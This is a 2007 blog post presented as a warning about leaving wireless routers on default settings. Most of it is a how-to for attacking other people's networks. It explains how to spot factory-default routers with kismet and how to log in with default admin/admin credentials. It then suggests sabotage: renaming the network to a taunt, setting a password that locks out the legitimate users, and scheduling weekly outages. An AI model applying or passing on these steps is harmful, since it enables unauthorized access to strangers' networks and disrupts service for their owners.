Monday, January 01, 2007

Why default settings on your wireless router is a BAD thing

Lots of people recognize that 802.11 wireless networks are really cool and want to have them. They go to Best Buy, grab a Linksys router, run home and, without going through the standard setup, plug the router into their network connection and turn it on. Hopefully you are not one of these people because these people leave their router completely vulnerable to whoever wants to take control of it.

Here, I will show how to discover one of these networks, how to get in to it, and what you can do once you're in command. I will be using the Linksys WRT54GL as an example, but the lessons here are very applicable to other makes and models as well.

First, the discovery. You're going to need a tool like kismet for this. If you're on Ubuntu Edgy Eft (like me), a simple sudo apt-get install kismet will install it on your machine. If you don't have apt-get or a comprable tool (such as yum on Red Hat flavors), you'll have to download and compile it from source yourself. Once you have kismet, edit the /etc/kismet/kismet.conf file. Edit the line that begins with "source=" to whatever is appropriate. The first value should be what comes up after the Nickname section of this command: iwconfig | grep Nickname. The second value should be the desired wireless interface (something like eth1... also on that same line of the previous command) and the third value is whatever you want to name this interface. Mine is source= ipw2100,eth1,wireless. More info is in the README under "Capture Sources." Fire up kismet with sudo kismet. Any detected networks that have the "F" under Flags (and, with color enabled, the line should come up as red) are networks with factory-default settings. These routers are often named "linksys" or "NETGEAR" or the like. If you want to change around the interface in kismet, edit the /etc/kismet/kismet_ui.conf file.

Now that you have your target, log onto the network and (hoping that this isn't a honeypot) point your browser to (this IP address may vary depending on the make and model of the network that you're hacking... NETGEAR routers, for example, are When prompted for a username and password, enter admin/admin. These are factory-set values that can be found for other models by searching on the Internet. For example, here and here (and here for D-link and here for Belkin). Congratulations, you're in.

What to do now? Well, as far as the router is concerned, a lot of things. Change the broadcasted ESSID of the network to "lol u R h4cked!" under Wireless->Basic Wireless Settings. Enable a password in Wireless->Wireless Security so that the legitimate users of the network will not be able to log on. In Access Restrictions, set the router so that it ceases to operate for five hours on Tuesdays. Etc. Of course, there are more things that you could do by exploiting the actual network itself, but that's beyond the scope of this entry.

No comments: